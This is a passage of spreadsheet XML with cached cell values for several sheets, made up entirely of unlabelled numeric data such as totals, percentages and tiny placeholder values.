            <v>2.6e-10</v>
          </cell>
          <cell r="S76">
            <v>3.56e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>4.01234567901235e-11</v>
          </cell>
          <cell r="V76">
            <v>4.1089566020314e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>24.00000000001</v>
          </cell>
          <cell r="R77">
            <v>152.23000000001</v>
          </cell>
          <cell r="S77">
            <v>5212.05000000012</v>
          </cell>
          <cell r="T77">
            <v>100.000000000042</v>
          </cell>
          <cell r="U77">
            <v>23.4922839506188</v>
          </cell>
          <cell r="V77">
            <v>60.1575484764557</v>
          </cell>
          <cell r="W77">
            <v>22.72</v>
          </cell>
          <cell r="X77">
            <v>20.58</v>
          </cell>
          <cell r="Y77">
            <v>19.79</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>8</v>
          </cell>
          <cell r="R79">
            <v>307.779444444444</v>
          </cell>
          <cell r="S79">
            <v>3945.33833333333</v>
          </cell>
          <cell r="T79">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U79">
            <v>47.4968278463649</v>
          </cell>
          <cell r="V79">
            <v>45.5371460449369</v>
          </cell>
          <cell r="W79">
            <v>102.625</v>
          </cell>
          <cell r="X79">
            <v>101.429775651034</v>
          </cell>
          <cell r="Y79">
            <v>102.195291236113</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>24</v>
          </cell>
          <cell r="R80">
            <v>249.4975</v>
          </cell>
          <cell r="S80">
            <v>2854.35333333333</v>
          </cell>
          <cell r="T80">
            <v>100</v>
          </cell>
          <cell r="U80">
            <v>38.5027006172839</v>
          </cell>
          <cell r="V80">
            <v>32.9449830717144</v>
          </cell>
          <cell r="W80">
            <v>78.25</v>
          </cell>
          <cell r="X80">
            <v>84.0329061413441</v>
          </cell>
          <cell r="Y80">
            <v>79.5563735393656</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>8</v>
          </cell>
          <cell r="R81">
            <v>215.214722222222</v>
          </cell>
          <cell r="S81">
            <v>3110.97805555556</v>
          </cell>
          <cell r="T81">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U81">
            <v>33.2121484910837</v>
          </cell>
          <cell r="V81">
            <v>35.906948933005</v>
          </cell>
          <cell r="W81">
            <v>238.75</v>
          </cell>
          <cell r="X81">
            <v>279.324803523096</v>
          </cell>
          <cell r="Y81">
            <v>275.932775696389</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="28">
        <row r="7">
          <cell r="P7">
            <v>200</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>15340</v>
          </cell>
          <cell r="Q8">
            <v>10593.625</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>737.39</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>4891.10610000004</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>105046.44300005</v>
          </cell>
          <cell r="E19">
            <v>5863.57000000002</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>4390</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>39528.7600000507</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>6084</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>5115.387</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>33204.1399999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>90.44</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>5728.06</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>737</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>625</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>11295.01</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>2565</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>3509.577</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>10037.298</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>341</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>1650.30199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>253</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3302.78600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>0</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>2.8e-5</v>
          </cell>
          <cell r="S72">
            <v>0.000369</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.24723756906077e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.15989159891599e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>24.000001</v>
          </cell>
          <cell r="R73">
            <v>209.910028</v>
          </cell>
          <cell r="S73">
            <v>5991.640369</v>
          </cell>
          <cell r="T73">
            <v>100.000004166667</v>
          </cell>
          <cell r="U73">
            <v>31.2366113095238</v>
          </cell>
          <cell r="V73">
            <v>68.9645530501842</v>
          </cell>
          <cell r="W73">
            <v>244.315406486858</v>
          </cell>
          <cell r="X73">
            <v>202.818752422825</v>
          </cell>
          <cell r="Y73">
            <v>238.021785716425</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>2.7e-10</v>
          </cell>
          <cell r="S76">
            <v>3.57e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>4.01785714285714e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10911602209945e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>24.00000000001</v>
          </cell>
          <cell r="R77">
            <v>176.23000000001</v>
          </cell>
          <cell r="S77">
            <v>5236.05000000012</v>
          </cell>
          <cell r="T77">
            <v>100.000000000042</v>
          </cell>
          <cell r="U77">
            <v>26.2247023809539</v>
          </cell>
          <cell r="V77">
            <v>60.2676104972389</v>
          </cell>
          <cell r="W77">
            <v>21.37</v>
          </cell>
          <cell r="X77">
            <v>20.7</v>
          </cell>
          <cell r="Y77">
            <v>19.8</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>23.9997222222222</v>
          </cell>
          <cell r="R79">
            <v>331.779166666667</v>
          </cell>
          <cell r="S79">
            <v>3969.33805555556</v>
          </cell>
          <cell r="T79">
            <v>99.9988425925926</v>
          </cell>
          <cell r="U79">
            <v>49.3718998015873</v>
          </cell>
          <cell r="V79">
            <v>45.6875927204829</v>
          </cell>
          <cell r="W79">
            <v>115.918008310281</v>
          </cell>
          <cell r="X79">
            <v>102.477802755347</v>
          </cell>
          <cell r="Y79">
            <v>102.27826260144</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>9.24972222222223</v>
          </cell>
          <cell r="R80">
            <v>258.747222222222</v>
          </cell>
          <cell r="S80">
            <v>2863.60305555556</v>
          </cell>
          <cell r="T80">
            <v>38.5405092592593</v>
          </cell>
          <cell r="U80">
            <v>38.5040509259259</v>
          </cell>
          <cell r="V80">
            <v>32.9604403263761</v>
          </cell>
          <cell r="W80">
            <v>79.6780684104627</v>
          </cell>
          <cell r="X80">
            <v>83.8772289557591</v>
          </cell>
          <cell r="Y80">
            <v>79.5567666258834</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>9.83305555555556</v>
          </cell>
          <cell r="R81">
            <v>225.047777777778</v>
          </cell>
          <cell r="S81">
            <v>3120.81111111111</v>
          </cell>
          <cell r="T81">
            <v>40.9710648148148</v>
          </cell>
          <cell r="U81">
            <v>33.4892526455026</v>
          </cell>
          <cell r="V81">
            <v>35.9209382033968</v>
          </cell>
          <cell r="W81">
            <v>260.854826407526</v>
          </cell>
          <cell r="X81">
            <v>278.517791283826</v>
          </cell>
          <cell r="Y81">
            <v>275.885268074895</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="29">
        <row r="7">
          <cell r="P7">
            <v>200</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>15340</v>
          </cell>
          <cell r="Q8">
            <v>10593.625</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>727.05</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>4164.05610000004</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>105046.44300005</v>
          </cell>
          <cell r="E19">
            <v>5855.38000000002</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>6725.07</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>38659.0700000508</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>4656</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4896.94</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>32963.1999999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>116.52</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>5611.54</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>359</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>541</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>11113.01</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>3513</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>3146.73</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>10403.568</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>369</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>1281.30199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>147.910000000001</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>193.5</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3257.19600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>3029.85</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>136.779999999999</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>2.9e-5</v>
          </cell>
          <cell r="S72">
            <v>0.00037</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.24701561065197e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.16216216216216e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>24.000001</v>
          </cell>
          <cell r="R73">
            <v>233.910029</v>
          </cell>
          <cell r="S73">
            <v>6015.64037</v>
          </cell>
          <cell r="T73">
            <v>100.000004166667</v>
          </cell>
          <cell r="U73">
            <v>33.6077627873563</v>
          </cell>
          <cell r="V73">
            <v>69.0500501606979</v>
          </cell>
          <cell r="W73">
            <v>243.974156501077</v>
          </cell>
          <cell r="X73">
            <v>207.041443272192</v>
          </cell>
          <cell r="Y73">
            <v>238.045533297065</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>2.8e-10</v>
          </cell>
          <cell r="S76">
            <v>3.58e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>4.02298850574713e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10927456382002e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>24.00000000001</v>
          </cell>
          <cell r="R77">
            <v>200.23000000001</v>
          </cell>
          <cell r="S77">
            <v>5260.05000000012</v>
          </cell>
          <cell r="T77">
            <v>100.000000000042</v>
          </cell>
          <cell r="U77">
            <v>28.768678160921</v>
          </cell>
          <cell r="V77">
            <v>60.3770661157038</v>
          </cell>
          <cell r="W77">
            <v>22.13</v>
          </cell>
          <cell r="X77">
            <v>20.89</v>
          </cell>
          <cell r="Y77">
            <v>19.81</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>16.1663888888889</v>
          </cell>
          <cell r="R79">
            <v>347.945555555556</v>
          </cell>
          <cell r="S79">
            <v>3985.50444444444</v>
          </cell>
          <cell r="T79">
            <v>67.3599537037037</v>
          </cell>
          <cell r="U79">
            <v>49.9921775223499</v>
          </cell>
          <cell r="V79">
            <v>45.7472961942659</v>
          </cell>
          <cell r="W79">
            <v>104.661592123576</v>
          </cell>
          <cell r="X79">
            <v>102.579266871254</v>
          </cell>
          <cell r="Y79">
            <v>102.287930093333</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>4.5</v>
          </cell>
          <cell r="R80">
            <v>263.247222222222</v>
          </cell>
          <cell r="S80">
            <v>2868.10305555556</v>
          </cell>
          <cell r="T80">
            <v>18.75</v>
          </cell>
          <cell r="U80">
            <v>37.8228767560664</v>
          </cell>
          <cell r="V80">
            <v>32.9212931078461</v>
          </cell>
          <cell r="W80">
            <v>79.7777777777778</v>
          </cell>
          <cell r="X80">
            <v>83.8071521278055</v>
          </cell>
          <cell r="Y80">
            <v>79.5571133882431</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>10.0830555555556</v>
          </cell>
          <cell r="R81">
            <v>235.130833333333</v>
          </cell>
          <cell r="S81">
            <v>3130.89416666667</v>
          </cell>
          <cell r="T81">
            <v>42.0127314814815</v>
          </cell>
          <cell r="U81">
            <v>33.7831657088123</v>
          </cell>
          <cell r="V81">
            <v>35.9377200030609</v>
          </cell>
          <cell r="W81">
            <v>258.354224634287</v>
          </cell>
          <cell r="X81">
            <v>277.653122197925</v>
          </cell>
          <cell r="Y81">
            <v>275.828809288507</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="30">
        <row r="7">
          <cell r="P7">
            <v>200</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>15340</v>
          </cell>
          <cell r="Q8">
            <v>10593.625</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>723.37</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>3440.68610000004</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>105046.44300005</v>
          </cell>
          <cell r="E19">
            <v>5762.37000000002</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>9381.605</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>35039.8350000508</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>7280.19</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>5631.488</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>34611.9019999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>280.39</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>5331.15</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>1323</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>572</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>11864.01</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>5957.19</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>3849.608</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>12511.15</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>371</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>910.301999999985</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>322.429999999999</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>323.884</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3255.74200000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>3027.903</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>519.804</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>3e-5</v>
          </cell>
          <cell r="S72">
            <v>0.000371</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.24679487179487e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.1644204851752e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>24.000001</v>
          </cell>
          <cell r="R73">
            <v>257.91003</v>
          </cell>
          <cell r="S73">
            <v>6039.640371</v>
          </cell>
          <cell r="T73">
            <v>100.000004166667</v>
          </cell>
          <cell r="U73">
            <v>35.8208375</v>
          </cell>
          <cell r="V73">
            <v>69.1350775068681</v>
          </cell>
          <cell r="W73">
            <v>240.098739995886</v>
          </cell>
          <cell r="X73">
            <v>210.117613494909</v>
          </cell>
          <cell r="Y73">
            <v>238.053692220411</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>2.9e-10</v>
          </cell>
          <cell r="S76">
            <v>3.59e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>4.02777777777778e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10943223443224e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>24.00000000001</v>
          </cell>
          <cell r="R77">
            <v>224.23000000001</v>
          </cell>
          <cell r="S77">
            <v>5284.05000000012</v>
          </cell>
          <cell r="T77">
            <v>100.000000000042</v>
          </cell>
          <cell r="U77">
            <v>31.1430555555569</v>
          </cell>
          <cell r="V77">
            <v>60.4859203296717</v>
          </cell>
          <cell r="W77">
            <v>21.91</v>
          </cell>
          <cell r="X77">
            <v>21.01</v>
          </cell>
          <cell r="Y77">
            <v>19.82</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>15.9997222222222</v>
          </cell>
          <cell r="R79">
            <v>363.945277777778</v>
          </cell>
          <cell r="S79">
            <v>4001.50416666667</v>
          </cell>
          <cell r="T79">
            <v>66.6655092592593</v>
          </cell>
          <cell r="U79">
            <v>50.5479552469136</v>
          </cell>
          <cell r="V79">
            <v>45.8047638125763</v>
          </cell>
          <cell r="W79">
            <v>100.501744821959</v>
          </cell>
          <cell r="X79">
            <v>102.48793507571</v>
          </cell>
          <cell r="Y79">
            <v>102.280788161952</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>15.1663888888889</v>
          </cell>
          <cell r="R80">
            <v>278.413611111111</v>
          </cell>
          <cell r="S80">
            <v>2883.26944444445</v>
          </cell>
          <cell r="T80">
            <v>63.1932870370371</v>
          </cell>
          <cell r="U80">
            <v>38.6685570987654</v>
          </cell>
          <cell r="V80">
            <v>33.0044579263329</v>
          </cell>
          <cell r="W80">
            <v>87.2323668931665</v>
          </cell>
          <cell r="X80">
            <v>83.9937383329559</v>
          </cell>
          <cell r="Y80">
            <v>79.5974862641465</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>16</v>
          </cell>
          <cell r="R81">
            <v>251.130833333333</v>
          </cell>
          <cell r="S81">
            <v>3146.89416666667</v>
          </cell>
          <cell r="T81">
            <v>66.6666666666667</v>
          </cell>
          <cell r="U81">
            <v>34.8792824074074</v>
          </cell>
          <cell r="V81">
            <v>36.0221401862027</v>
          </cell>
          <cell r="W81">
            <v>271.824375</v>
          </cell>
          <cell r="X81">
            <v>277.281762162485</v>
          </cell>
          <cell r="Y81">
            <v>275.808449230233</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="31">
        <row r="7">
          <cell r="P7">
            <v>200</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>15340</v>
          </cell>
          <cell r="Q8">
            <v>10593.625</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>697.36</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>2743.32610000004</v>
          </cell>
        </row>
        <row r="9">
          <cell r="V9">
            <v>0</v>
          </cell>
          <cell r="W9">
            <v>0</v>
          </cell>
          <cell r="X9">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="V10">
            <v>697.36</v>
          </cell>
          <cell r="W10">
            <v>7850.2989</v>
          </cell>
          <cell r="X10">
            <v>185129.2989</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>105046.44300005</v>
          </cell>
          <cell r="E19">
            <v>5548.73000000002</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>4446.77</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>36141.7950000508</v>
          </cell>
        </row>
        <row r="20">
          <cell r="E20">
            <v>1e-11</v>
          </cell>
          <cell r="F20">
            <v>3.1e-10</v>
          </cell>
          <cell r="G20">
            <v>3.41e-9</v>
          </cell>
        </row>
        <row r="21">
          <cell r="E21">
            <v>5548.73000000001</v>
          </cell>
          <cell r="F21">
            <v>59740.1700000003</v>
          </cell>
          <cell r="G21">
            <v>1443307.42</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>5651</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4405.233</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>35857.6689999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>848</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>85.04</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>6094.11</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>843</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>443</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>12264.01</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>3086</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>3299.003</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>12298.147</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>874</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>343</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>1441.30199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>37.1599999999999</v>
          </cell>
